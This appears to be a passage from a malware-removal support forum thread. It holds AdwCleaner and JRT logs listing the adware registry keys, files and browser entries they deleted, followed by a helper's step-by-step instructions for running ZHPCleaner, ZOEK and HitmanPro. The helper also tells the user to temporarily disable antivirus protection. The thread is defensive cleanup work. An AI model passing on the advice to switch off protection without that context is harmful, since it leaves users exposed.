File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage-journal
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.reimageplus.com_0.localstorage
File Deleted : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.reimageplus.com_0.localstorage-journal

***** [ Scheduled tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdate.OneClickProcessLauncherMachine.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoCreateAsync.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass.1
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreMachineClass.1
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CredentialDialogMachine.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachine.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.ProcessLauncher.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback.1.0
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc
Key Deleted : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc.1.0
Key Deleted : HKLM\SOFTWARE\1330afbb-8c11-4d38-90d6-a699e10457fe
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550655795577}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660666796677}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550655795577}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660666796677}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EE932B49-D5C0-4D19-A3DA-CE0849258DE6}
Key Deleted : HKCU\Software\APN PIP
Key Deleted : HKCU\Software\GlobalUpdate
Key Deleted : HKCU\Software\Baidu
Key Deleted : HKCU\Software\AceStream
Key Deleted : HKCU\Software\AppDataLow\Software\Super Radio
Key Deleted : HKLM\SOFTWARE\GlobalUpdate
Key Deleted : HKLM\SOFTWARE\Uniblue
Key Deleted : HKLM\SOFTWARE\Baidu
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AceStream
Key Deleted : [x64] HKLM\SOFTWARE\InstalledBrowserExtensions
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - *.local

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17416

-\\ Mozilla Firefox v37.0.1 (x86 en-US)

-\\ Google Chrome v41.0.2272.118

[C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Extension] : mfhnkgpdlogbknkhlgdjlejeljbhflim

*************************

AdwCleaner[R0].txt - [8255 bytes] - [12/04/2015 22:58:51]
AdwCleaner[R1].txt - [8314 bytes] - [12/04/2015 23:01:06]
AdwCleaner[S0].txt - [8226 bytes] - [12/04/2015 23:03:10]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8285  bytes] ##########



#14 ah_hin

ah_hin
  • Topic Starter

  • Members
  • 61 posts
  • OFFLINE
  •  
  • Local time:08:16 AM

Posted 13 April 2015 - 01:13 AM

Last one from JRT:

-----------------------------------------------------------------------------

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.5.3 (04.07.2015:1)
OS: Windows 8.1 x64
Ran by User on Sun 04/12/2015 at 23:08:19.67
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

 

~~~ Registry Values

 

~~~ Registry Keys

 

~~~ Files

 

~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\flexnet"

 

~~~ FireFox

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\MozillaPlugins\@baidu.com/npxbdsetup
Successfully deleted the following from C:\Users\User\AppData\Roaming\mozilla\firefox\profiles\8qz11wfm.default\prefs.js

user_pref("browser.newtabpage.pinned", "[{\"url\":\"hxxps://www.google.com/\",\"title\":\"Google\"},{\"url\":\"hxxp://espn.go.com/\",\"title\":\"ESPN: The Worldwide Leader In
Emptied folder: C:\Users\User\AppData\Roaming\mozilla\firefox\profiles\8qz11wfm.default\minidumps [21 files]

 

~~~ Event Viewer Logs were cleared

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sun 04/12/2015 at 23:11:54.73
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#15 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:16 PM

Posted 13 April 2015 - 01:36 AM

Hi,

 

 

Let me take a closer look.

 

 

STEP 1

 

 

icon_zps423a0d9f.jpg Please download ZHPCleaner (by NicolasCoolman) to your desktop.

  • Double click on ZHPCleaner to run the tool. (Vista/Windows 7/8 users right-click and select Run As Administrator).
  • Please click the Ashampoo_Snap_20140819_13h09m50s_001__zp button.
  • Then press the y3pI4LR.png button.
  • During the scan any open instances of the browsers will be closed automatically.
  • A logfile will automatically open after the scan has finished.
  • Please post the contents of that logfile with your next reply.

 

 

STEP 2

 

 

 

Please download ZOEK (by Smeenk) and save it to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection. See here on how to do this.

  • Right-click on 51a612a8b27e2-Zoek.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Wait patiently until the main console will appear, it may take a minute or two.

52b6de58f1952-Zoek_Startpagina_5.0.0.0.P

  • In the main box please paste in the following script:

 

createsrpoint;
chromelook;
emptyCHRcache;
firefoxlook;
emptyFFcache;
FFdefaults;
emptyIEcache;
iedefaults;
shortcutfix;
selectgo;a
selectgo;z

  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive).
  • Post its content into your next reply.

 

 

STEP 3

 

 

1.Please download HitmanPro.

  • For 32-bit Operating System - dEMD6.gif.
  • This is the mirror - dEMD6.gif
  • For 64-bit Operating System - dEMD6.gif
  • This is the mirror - dEMD6.gif

2.Launch the program by double clicking on the 5vo5F.jpg icon. (Windows Vista/7 users right click on the HitmanPro icon and select run as administrator).

Note: If the program won't run please then open the program while holding down the left CTRL key until the program is loaded.

3.Click on the next button. You must agree with the terms of EULA. (if asked)

4.Check the box beside "No, I only want to perform a one-time scan to check this computer".

5.Click on the next button.

6.The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7.When the scan is done click on drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!

 

6-scanfin-choose.jpg
 
8.Click on the next button.

9.Click on the "Save Log" button.

10.Save that file to your desktop and post the content of that file in your next reply.
 
Note: if there isn't a dropdown menu when the scan is done then please don't delete anything and close HitmanPro

Navigate to C:\ProgramData\HitmanPro\Logs open the report and copy and paste it to your next reply.

 

Note: Programdata is hidden by default. Please make sure that you can view all hidden files. Instructions on how to do this can be found here:
How to see hidden files in Windows

 

 

 

Regards,

Georgi


cXfZ4wS.png





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users